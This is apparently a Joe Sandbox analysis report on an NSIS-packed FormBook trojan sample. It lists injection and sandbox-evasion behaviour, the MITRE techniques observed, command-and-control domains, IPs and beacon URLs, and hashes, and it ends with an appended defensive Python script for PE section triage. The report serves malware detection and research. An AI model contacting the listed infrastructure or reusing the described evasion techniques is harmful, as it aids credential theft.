          [Source: Yara match] File source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          [Source: Yara match] File source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          [Source: Yara match] File source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          MITRE ATT&CK Matrix (one row per line, columns separated by "|"; the digits preceding a technique name are the report's counters for that cell, carried over as they appeared)

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 2 Command and Scripting Interpreter | Path Interception | 412 Process Injection | 1 Rootkit | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | 11 Input Capture | 241 Security Software Discovery | Remote Desktop Protocol | 11 Input Capture | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 2 Virtualization/Sandbox Evasion | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 412 Process Injection | NTDS | 2 Process Discovery | Distributed Component Object Model | 2 Clipboard Data | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Software Packing | DCSync | 114 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Behavior Graph (ID: 755996, Sample: 2022-571-GLS.exe, Startdate: 29/11/2022, Architecture: WINDOWS, Score: 100), rendered as text in place of the graph image:

          • Start node signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
          • 2022-571-GLS.exe started; dropped C:\Users\user\AppData\Local\...\jsqqecy.exe (PE32); started jsqqecy.exe
          • jsqqecy.exe: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started a second jsqqecy.exe
          • jsqqecy.exe (second instance): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection); injected explorer.exe
          • explorer.exe (injected): www.fulili.com 45.221.114.43, port 49698 -> 80, sun-asnSC, South Africa; td-ccm-168-233.wixdns.net 34.117.168.233, port 49696 -> 80, GOOGLE-AS-APGoogleAsiaPacificPteLtdSG, United States; 4 other IPs or domains; System process connects to network (likely due to code injection or exploit); Uses netsh to modify the Windows network and firewall settings; started netsh.exe
          • netsh.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started cmd.exe
          • cmd.exe started conhost.exe

          Source | Detection | Scanner | Label
          2022-571-GLS.exe | 30% | ReversingLabs | Win32.Packed.Generic
          2022-571-GLS.exe | 100% | Joe Sandbox ML |

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\jsqqecy.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Temp\jsqqecy.exe | 20% | ReversingLabs | Win32.Trojan.FormBook

          Source | Detection | Scanner | Label
          1.2.jsqqecy.exe.1090000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.2022-571-GLS.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
          2.0.jsqqecy.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.2022-571-GLS.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
          2.2.jsqqecy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Source | Detection | Scanner | Label
          td-ccm-168-233.wixdns.net | 0% | Virustotal |

          Source | Detection | Scanner | Label
          http://www.fulili.com/b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi | 0% | Avira URL Cloud | safe
          http://www.cdlcapitolsolutions.com/b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi | 100% | Avira URL Cloud | malware
          http://www.easyentry.vip/b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi | 0% | Avira URL Cloud | safe
          www.cdlcapitolsolutions.com/b31b/ | 100% | Avira URL Cloud | malware
          www.cdlcapitolsolutions.com/b31b/ | 1% | Virustotal |

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          td-ccm-168-233.wixdns.net | 34.117.168.233 | true | true | | unknown
          www.fulili.com | 45.221.114.43 | true | true | | unknown
          825610.parkingcrew.net | 75.2.81.221 | true | false | | high
          www.cdlcapitolsolutions.com | unknown | unknown | true | | unknown
          www.easyentry.vip | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://www.cdlcapitolsolutions.com/b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi | true | Avira URL Cloud: malware | unknown
          http://www.fulili.com/b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi | true | Avira URL Cloud: safe | unknown
          http://www.easyentry.vip/b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi | true | Avira URL Cloud: safe | unknown
          www.cdlcapitolsolutions.com/b31b/ | true | Virustotal: 1%; Avira URL Cloud: malware | low

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.autoitscript.com/autoit3/J | explorer.exe, 00000003.00000000.364781909.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.317290516.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.347986981.0000000008260000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://nsis.sf.net/NSIS_Error | 2022-571-GLS.exe | false | | high
          http://nsis.sf.net/NSIS_ErrorError | 2022-571-GLS.exe | false | | high

          IP | Domain | Country | ASN | ASN Name | Malicious
          45.221.114.43 | www.fulili.com | South Africa | 328543 | sun-asnSC | true
          34.117.168.233 | td-ccm-168-233.wixdns.net | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | true
          75.2.81.221 | 825610.parkingcrew.net | United States | 16509 | AMAZON-02US | false

                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:755996
                        Start date and time:2022-11-29 13:15:07 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 7m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:2022-571-GLS.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:11
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@9/4@3/3
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 68.9% (good quality ratio 59.8%)
                        • Quality average: 70.7%
                        • Quality standard deviation: 35.5%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
• Not all processes were analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):147968
                        Entropy (8bit):6.1823629557808895
                        Encrypted:false
                        SSDEEP:3072:5qOPPLBLPd3kaQ+nBwYb+SxRC//LhYcglg7JdWGAwDY4Y4OCJiy:5qiLBLPdm/DhwgF4GduSv
                        MD5:07875284CE0A6276F406B25F9E429270
                        SHA1:38A67882404FE8CD7473C8B1949A0B5384B36F94
                        SHA-256:AED6B2A3FB3845ECBC1AB0DFE26AED0CFFD1D220CA86F77BEBB44ECA02B3229E
                        SHA-512:5DB9EF373A1535012BFEA4E4052616C4AF565B57535B2F5F381261AD2D13213592BB4AA80FFDE21139E00D8EB1B5A2612F205F72CA816613510F0D292C0A44C1
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 20%
                        Reputation:low
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.c..........................................@.......................................@.........................................................................................................`...................|............................text...0........................... ..`.rdata..$t.......v..................@..@.data....%...@......................@....00cfg.......p.......&..............@..@.voltbl."............(...................rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):351352
                        Entropy (8bit):7.441400818204764
                        Encrypted:false
                        SSDEEP:6144:FzKMbPJYY6ICfgM26evm226r8wqiLBLPdm/DhwgF4GduSv:08a+6xcqiLBLPcNnjdr
                        MD5:F1E31AC6BD355DFA2F813075E84BCD0D
                        SHA1:2C7C4B34C64E295DC9A1A7C803EB4E715AA00559
                        SHA-256:39D893328B257A69AAB166D4843B16970AA8DF9B615A7356B8D3DB8351CFF089
                        SHA-512:41B4422AB47A9FE2415678EA499D58F6AFF971044C581B95D8F6EC723248AD91CC622F6172D9B639DFEF4FAAFFD56F6180B63B03E3C1739C48FB54D34F510EFF
                        Malicious:false
                        Reputation:low
                        Preview:........,...................[...............................................................................................................................................................................................................................................................J...............!...j...........................................................................................................................................%...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5765
                        Entropy (8bit):6.2092599243644075
                        Encrypted:false
                        SSDEEP:96:xqZQ5qvebu9XscBHOPNr9p1H9sBL3I9I4kcAlsRW1aR1vOj4GV8rqxyRG2OJkac/:xiQqGq9Xs+O1smVr+8WxyfikaF0MOJOY
                        MD5:813EA3E20968DCA381FD705CCE6352AF
                        SHA1:F5641EE0577E29603C5146827B0F3E920B307011
                        SHA-256:BA88F948DE0F61DD0E1E09D5ABB977794A350380612C4F8E5AB7A7D5D3C5E108
                        SHA-512:681484352435EF93B1E3EC909F30627C4373CB5F862A60C523DA9A02AE5DA9292004BD5C1787686E9025C81A19C47AB25F7B6F7072A86E3211728B02A95A63F3
                        Malicious:false
                        Reputation:low
                        Preview:.f.. .\...+l.+l.+.+.+l...+. .\...zw+l.+$.+..-...\.V...=.0.+Z[.-.s..+jT.......+.z+-..Jc..w..+....j........b+.=.-........+.y .\...+l.+l.+.+.+l..'...|.t...=.0.E..y........c}...s....+.+}.z+.=.0U+..=.0.w+5.=.0.K...v4.jC..-........+.yy.zw+5.s.+gX+.d$..+|L+....+t`..+l...1..1..1}.=.0.+....|.N...[}.0V+..j[-.6.s...{....+}.....+.C...+.yy.zw .\...+l.+l.+.+.+l..0...|.-...+5.+.w1.....-.+...[.-.C...w..=.0{+}.K.1}...Pd..+...+.Et.C.L..+.~.[.Er....g.EjL.....[.+..g..[.-.+5.+..C..15.w1.....[.+}.6.s..s.l..{.....+.z+-..Jc..w..+....E.........b+.=.-........+.).....}....E}.1}..}.[.}.e.}...}.6.}.3C...C.......1}.....1}.....1}.....1}.....1}.....1}..R..1}.....1}.....1}.s..1}.&...1}.......-..Y...1}<.cZ...-..I...1}...6...-......1}.......-......1}8.l....-......1}D.zN...-......1}...U...-......1}..$.9..-....1}.s.l.....s.l....s.l....es.l.....js.l....iE}.1}.C.....+}.l1}.C5..3`+}.s.....+}....+....h.s.+}.4h....s.l.....s.i...h.[.-.s.l.....s.i...h.[.-hs.l......s.i....h.[.-ps.l
                        Process:C:\Users\user\Desktop\2022-571-GLS.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):189440
                        Entropy (8bit):7.990584575642086
                        Encrypted:true
                        SSDEEP:3072:lMbPJNjiLu5FhvUoerrdDaVCz37gMbapLPlA/evm2260F+8vV:lMbPJYY6ICfgM26evm226r89
                        MD5:1CBA56AA7342010C42DE3448072BFFD6
                        SHA1:41750AFCF5D21B6C3D1EF4D8B17CD5C283353206
                        SHA-256:1F2933BB236406B4E5E0C84B64441F7103E8860C3DB1014E1D07BEABD47AC584
                        SHA-512:E0DFB340E005729E784C828BEBFD428C147DB6EBC06A4261C960CE5CC2F5379A65DD723E7959A75A6D4F297AB5F7FC22ABE255D17E29E6D971E2E78845ADEE61
                        Malicious:false
                        Reputation:low
                        Preview:......b......+...Z]..[.S=.+4..O|......N..pF..X..+.L%..d..",.*.x....8-v@.).B!..g....:.@\f....r.jk...B..K.].C.../.xh....'e.i...._..?A..L......%....-.l....5..[.P;.(.j.|..s..?c..;..Kr{2/...,.UPU.`.c..A\i....t\?=..Ox.(..1 ..,z-tf\V.@.._..AZ9..BB.....^..x.b;...ML.w...]B....:..g-..|.n....N...F..X..+.L ..d..",.*.xo.!..=p.;b...9.#..k...)e..};.....<3..Z..'"..>r.4$..)1\...'e.i.R.}../..Aj.!g.[%.{..w. .G...=....>.......p!dX..?c..;...WX./..<C....q......]\i..r.K*%.U.......1 ..,z..3\V.@.....AZ....B.H..f^9.x.b....ML.w.2.]B....:...-.O|......N..pF..X..+.L%..d..",.*.xo.!..=p.;b...9.#..k...)e..};.....<3..Z..'"..>r.4$..)1\...'e.i.R.}../..Aj.!g.[%.{..w. .G...=....>.......p!dX..?c..;..Kr{2/...>..qq..;_..A\i..r.K*%.U.O..(..1 ..,z..3\V.@.....AZ....B.H..f^9.x.b....ML.w.2.]B....:...-.O|......N..pF..X..+.L%..d..",.*.xo.!..=p.;b...9.#..k...)e..};.....<3..Z..'"..>r.4$..)1\...'e.i.R.}../..Aj.!g.[%.{..w. .G...=....>.......p!dX..?c..;..Kr{2/...>..qq..;_..A\i..r.K*%.U.O..(..1 ..,z
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.93130981619841
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:2022-571-GLS.exe
                        File size:274453
                        MD5:6cc14805bbf5e6bfb4daae5c8a61af7e
                        SHA1:34836f2aa6a4e97705352a50d2a7147c857fea94
                        SHA256:029d4fe47cb21a8f4e1dbe1863cf43cba6ac777e008b9675d381fda82986196b
                        SHA512:5f1bb5a77d471e49e15ff414b24ac89858e5458884f8f672a92376434dd9363e6d80146d6448b4ee0233c70531f58c4c7d431d9f873e6d1a2fdacf680479b2c6
                        SSDEEP:6144:QBn14u11x6y/QH2tw81qVegiZU/S4RaXFKia7ZiOfu:g4uRX4WvqMgiZgSXFKhZiO2
                        TLSH:224412ABB2E70AB3C46345729F35B331E67EE910113456BF33E22E779E702979406291
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........
                        Icon Hash:b2a88c96b2ca6a72
                        Entrypoint:0x40324f
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:ab6770b0a8635b9d92a5838920cfe770
Entrypoint instructions (0x40324f, .text):
                        sub esp, 00000180h
                        push ebx
                        push ebp
                        push esi
                        push edi
                        xor ebx, ebx
                        push 00008001h
                        mov dword ptr [esp+1Ch], ebx
                        mov dword ptr [esp+14h], 00409130h
                        xor esi, esi
                        mov byte ptr [esp+18h], 00000020h
                        call dword ptr [004070B8h]
                        call dword ptr [004070B4h]
                        cmp ax, 00000006h
                        je 00007F91F4D06083h
                        push ebx
                        call 00007F91F4D08E71h
                        cmp eax, ebx
                        je 00007F91F4D06079h
                        push 00000C00h
                        call eax
                        push 004091E0h
                        call 00007F91F4D08DF2h
                        push 004091D8h
                        call 00007F91F4D08DE8h
                        push 004091CCh
                        call 00007F91F4D08DDEh
                        push 0000000Dh
                        call 00007F91F4D08E41h
                        push 0000000Bh
                        call 00007F91F4D08E3Ah
                        mov dword ptr [00423F84h], eax
                        call dword ptr [00407034h]
                        push ebx
                        call dword ptr [00407270h]
                        mov dword ptr [00424038h], eax
                        push ebx
                        lea eax, dword ptr [esp+34h]
                        push 00000160h
                        push eax
                        push ebx
                        push 0041F538h
                        call dword ptr [00407160h]
                        push 004091C0h
                        push 00423780h
                        call 00007F91F4D08A71h
                        call dword ptr [004070B0h]
                        mov ebp, 0042A000h
                        push eax
                        push ebp
                        call 00007F91F4D08A5Fh
                        push ebx
                        call dword ptr [00407144h]
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73cc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5c4a | 0x5e00 | False | 0.659906914893617 | data | 6.410763775060762 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x115e | 0x1200 | False | 0.4466145833333333 | data | 5.142548180775325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1b078 | 0x600 | False | 0.455078125 | data | 4.2252195571372315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2d000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.509328731926377 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
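The section table is the first thing a static triage pass reads: a section that is both writable and executable, a section whose virtual size dwarfs its raw size (.data above reserves 0x1b078 bytes but carries only 0x600 on disk, room that is filled at run time), or a section whose entropy sits near 8 bits per byte all raise the cost of trusting the file. The following Python is an added example, not code from the Joe Sandbox report or from the sample; it parses the COFF section headers of a PE image with the standard library only, computes the same per-section entropy the report's Entropy column shows, and flags the three conditions above. The PE image it runs on is constructed in `build_demo_image` so the block works offline; it is not 2022-571-GLS.exe, and the two thresholds are demo assumptions.

```python
"""Added example: parse the PE section table and flag sections a triage analyst
would look at (writable+executable, high entropy, large virtual-vs-raw slack).
Stdlib only; the image built below is constructed here, it is not the sample."""
import math
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

PACKED_ENTROPY_THRESHOLD = 7.0  # bits/byte; compressed or encrypted data sits near 8.0 (assumed cut-off)
SLACK_RATIO_THRESHOLD = 8       # VirtualSize / SizeOfRawData worth a look (assumed cut-off)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, 0.0 for empty input (same scale as the report's Entropy column)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section headers; one dict per section."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    number_of_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_of_optional_header = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + size_of_optional_header        # section headers follow the optional header
    sections = []
    for i in range(number_of_sections):
        off = table + i * 40                           # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        characteristics = struct.unpack_from("<I", image, off + 36)[0]
        raw = image[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": shannon_entropy(raw),
            "rwx": bool(characteristics & IMAGE_SCN_MEM_WRITE and characteristics & IMAGE_SCN_MEM_EXECUTE),
            "uninitialized": bool(characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA),
            "slack_ratio": (vsize / raw_size) if raw_size else None,
        })
    return sections


def suspicious_sections(image: bytes) -> dict:
    """Map section name -> reasons, for the sections worth a closer look."""
    findings = {}
    for s in parse_sections(image):
        reasons = []
        if s["rwx"]:
            reasons.append("writable and executable")
        if s["entropy"] >= PACKED_ENTROPY_THRESHOLD:
            reasons.append("high entropy (%.2f)" % s["entropy"])
        # .bss-style sections legitimately have no raw data; only judge slack on initialized ones.
        if s["slack_ratio"] and s["slack_ratio"] >= SLACK_RATIO_THRESHOLD and not s["uninitialized"]:
            reasons.append("virtual size %dx raw size" % int(s["slack_ratio"]))
        if reasons:
            findings[s["name"]] = reasons
    return findings


def build_demo_image() -> bytes:
    """Constructed two-section PE32 image (demo input, NOT the 2022-571-GLS.exe sample)."""
    def section_header(name, vsize, va, raw_size, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, chars)

    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                 # e_lfanew -> right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)       # i386, 2 sections, PE32 optional header
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)                            # PE32 magic
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(optional)
    headers += section_header(b".text", 0x200, 0x1000, 0x200, 0x200,
                              IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    headers += section_header(b".stub", 0x4000, 0x2000, 0x200, 0x400,
                              IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE
                              | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    headers = headers.ljust(0x200, b"\0")
    text_body = b"\x90" * 0x100 + b"\xC3" + b"\0" * 0xFF                  # low-entropy, code-like bytes
    stub_body = bytes(range(256)) * 2                                     # every byte value twice: entropy exactly 8.0
    return headers + text_body + stub_body


if __name__ == "__main__":
    for name, reasons in suspicious_sections(build_demo_image()).items():
        print(name, "->", "; ".join(reasons))
```

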